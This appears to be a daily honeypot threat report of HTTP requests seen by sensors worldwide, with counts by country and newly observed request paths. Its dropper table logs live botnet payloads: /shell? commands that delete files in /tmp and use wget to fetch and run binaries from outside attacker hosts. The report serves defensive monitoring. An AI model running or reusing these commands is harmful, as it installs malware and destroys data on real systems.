Skip to main content
  1. Daily-Posts/

Report: 2025-07-19

·353 words·
Repport Daily
Author
Shoggoth Industries
Table of Contents

Daily Report: 2025-07-19
#

Executive summary
#

interaction report on http service of various Hhoneypot around the world.

executive_summary
#

In today’s repport, we detected 8 stage 1 IP address(es), linked to 2 dropper URL(s).

There are 12 new requests that have never been observed before (these were added to the monitored request database.).

A total of 614 requests were recorded during the day, originating from 8 different countries, with a peak of 165 requests coming from US.

ot_simplified_report
#

simplified report for medium-level interactions with honeypots that mimic industrial systems (web site loading, or interactions with the website), for more contact us on social@shoggoth.industries.

source_countrytargeted_country
USDubai
CNGeorgia

botnet_dropper_behaviour
#

remote_addrrequest
47.236.23.123GET /shell?cd+/tmp;rm+-rf+*;wget+ scamanje.stresserit.pro/jaws;sh+/tmp/jaws HTTP/1.1
8.222.172.218GET /shell?cd+/tmp;rm+-rf+*;wget+ scamanje.stresserit.pro/jaws;sh+/tmp/jaws HTTP/1.1
118.182.79.13GET /shell?cd+/tmp;rm+-rf+*;wget+ scamanje.stresserit.pro/jaws;sh+/tmp/jaws HTTP/1.1
8.222.219.91GET /shell?cd+/tmp;rm+-rf+*;wget+ scamanje.stresserit.pro/jaws;sh+/tmp/jaws HTTP/1.1
8.222.249.62GET /shell?cd+/tmp;rm+-rf+*;wget+ scamanje.stresserit.pro/jaws;sh+/tmp/jaws HTTP/1.1
45.153.34.79GET /shell?cd+/tmp;rm+-rf+arm7;nohup+wget+http:/\x5C/45.125.66.95/x86;chmod+777+x86;./x86;cd+/tmp;rm+-rf+arm7;nohup+wget+http:/\x5C/45.125.66.95/arm7;chmod+777+arm7;./arm7 HTTP/1.1
8.222.223.100GET /shell?cd+/tmp;rm+-rf+*;wget+ scamanje.stresserit.pro/jaws;sh+/tmp/jaws HTTP/1.1
8.222.230.103GET /shell?cd+/tmp;rm+-rf+*;wget+ scamanje.stresserit.pro/jaws;sh+/tmp/jaws HTTP/1.1

request
#

The list of requests presented here are those that have not yet been yet integrated into the request database.

number_of_occurencerequest
233POST /UD/act?1 HTTP/1.1
453GET /VGAuth1.zip HTTP/1.1
801GET /OdinHttpCall1752933556 HTTP/1.1
811GET /odinhttpcall1752933556 HTTP/1.1
961GET /Odin/http/call1752933556 HTTP/1.1
1061GET /odinhttpcall1752935646 HTTP/1.1
1071GET /OdinHttpCall1752935646 HTTP/1.1
1081GET /Odin/http/call1752935646 HTTP/1.1
1281GET /Odin/http/call1752933756 HTTP/1.1
1291GET /OdinHttpCall1752933756 HTTP/1.1
1301GET /odinhttpcall1752933756 HTTP/1.1
1451Content-Length: 55

country_iso_code
#

number_of_occurencecountry_iso_code
0165US
1111DE
256PL
355GB
437NL
532BG
629HK
720CN
817FR
913SG
1010HU
1110DO
128CA
137RU
146UA
155BE
165BR
174IN
183PT
193KR
203KZ
212IE
222SC
232CH
241LT
251MX
261PA
271IR
281SI
291ZA
301CZ
311JP
321SE

Related

Report: 2025-07-18
·474 words
Repport Daily
Report: 2025-07-17
·463 words
Repport Daily
Report: 2025-07-16
·389 words
Repport Daily